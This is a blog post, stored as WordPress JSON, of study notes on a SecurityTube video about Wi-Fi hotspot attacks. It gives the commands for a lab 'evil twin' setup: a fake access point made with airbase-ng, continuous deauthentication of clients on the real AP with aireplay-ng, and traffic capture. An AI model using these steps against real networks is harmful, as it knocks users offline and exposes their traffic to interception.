{"id":484,"date":"2011-10-17T21:59:37","date_gmt":"2011-10-17T21:59:37","guid":{"rendered":"http:\/\/41j.com\/blog\/?p=484"},"modified":"2011-10-17T21:59:37","modified_gmt":"2011-10-17T21:59:37","slug":"securitytube-wireless-lan-security-megaprimer-notes-part-9-hotspot-attacks","status":"publish","type":"post","link":"https:\/\/41j.com\/blog\/2011\/10\/securitytube-wireless-lan-security-megaprimer-notes-part-9-hotspot-attacks\/","title":{"rendered":"SecurityTube, Wireless Lan Security Megaprimer notes: part 9 (Hotspot attack basics)"},"content":{"rendered":"

Vivek’s video is here<\/a>.<\/p>\n

Vivek shows you how to setup a fake software access point and force existing clients to connect to it in preference to the original access point. From this point a number of attacks could be launched, including man-in-the-middle attacks. These attacks are not discussed in detail here.<\/p>\n

Wireless hotspots are usually Open Auth, sometimes have MAC filtering, no encryption (can’t really work here). May have application layer authentication (login portal).<\/p>\n

Attacks<\/h2>\n

* Create an “evil twin”:
\n * Same ESSID
\n * Same BSSID (optional)<\/p>\n

* Use de-auth to break client connections<\/p>\n

* If our “evil” network has higher strength, then client will connect to it preferentially.<\/p>\n

* Further attack options then exist. (metasploit the client, man in the middle)<\/p>\n

0. Locate your target network with airodump. (For the lab setup an AP with no encryption, in the examples it’s called SecurityTube)<\/p>\n

1. Use airbase-ng to create an access point.<\/p>\n

\r\niwconfig wlan0 channel NN # can be any channel\r\nairbase-ng -a AA:AA:AA:AA:AA:AA -e SecurityTube mon0\r\n<\/pre>\n
This access point has 2 interfaces. One is mon0, the wireless interface.
\nairbase-ng creates a virtual network device called at0. This is the wired side of access point.<\/p>\n
2. Bring up the virtual interface<\/p>\n
\r\nifconfig at0 up\r\n<\/pre>\n
That was just to test things out, kill airbase-ng.<\/p>\n
3. Connect a client to the real access point.<\/p>\n
4. Deauth all clients<\/p>\n
\r\niwconfig channel NN # same channel as REAL AP.\r\naireplay-ng --deauth 0 -a BSSID_OF_REAL_AP mon0 # BSSID found in airodump\r\n<\/pre>\n
Leave this running in the background.<\/p>\n
5. Bring up airbase-ng again. In this case, we’re running airbase on the same channel (so we can send deauths in the background).<\/p>\n
\r\nairbase-ng -a AA:AA:AA:AA:AA:AA -e SecurityTube mon0 # BSSID can be anything.\r\n<\/pre>\n
6. Try and connect your client again. Your client should connect to your soft access point.<\/p>\n
7. Capture some data with wireshark on at0.<\/p>\n
\r\nifconfig at0 up #bring up at0\r\n<\/pre>\n
After a while, the client will give up trying to obtain a DHCP address.
\nIt will assign itself an autoconfig address. You’ll see this in wireshark.
\nSource address will be listed as 169.x.x.x, in Vivek’s case he saw IGMP packets.<\/p>\n
8. Assign at0 an address in this range and attempt to ping the client:<\/p>\n
\r\nifconfig at0 169.254.174.XX netmask 255.255.255.0 up #where 169.254.174.XX is an address in the same range as the client.\r\nping <address found in wireshark>\r\n<\/pre>\n
You can now access the client at the IP level.<\/p>\n","protected":false},"excerpt":{"rendered":"
Vivek’s video is here. Vivek shows you how to setup a fake software access point and force existing clients to connect to it in preference to the original access point. From this point a number of attacks could be launched, including man-in-the-middle attacks. These attacks are not discussed in detail here. Wireless hotspots are usually […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[14,13,12,10,11],"class_list":["post-484","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-pentest","tag-security","tag-securitytube","tag-wifi","tag-wifiprimer"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p1RRoU-7O","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts\/484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/comments?post=484"}],"version-history":[{"count":1,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts\/484\/revisions"}],"predecessor-version":[{"id":485,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/posts\/484\/revisions\/485"}],"wp:attachment":[{"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/media?parent=484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/categories?post=484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/41j.com\/blog\/wp-json\/wp\/v2\/tags?post=484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}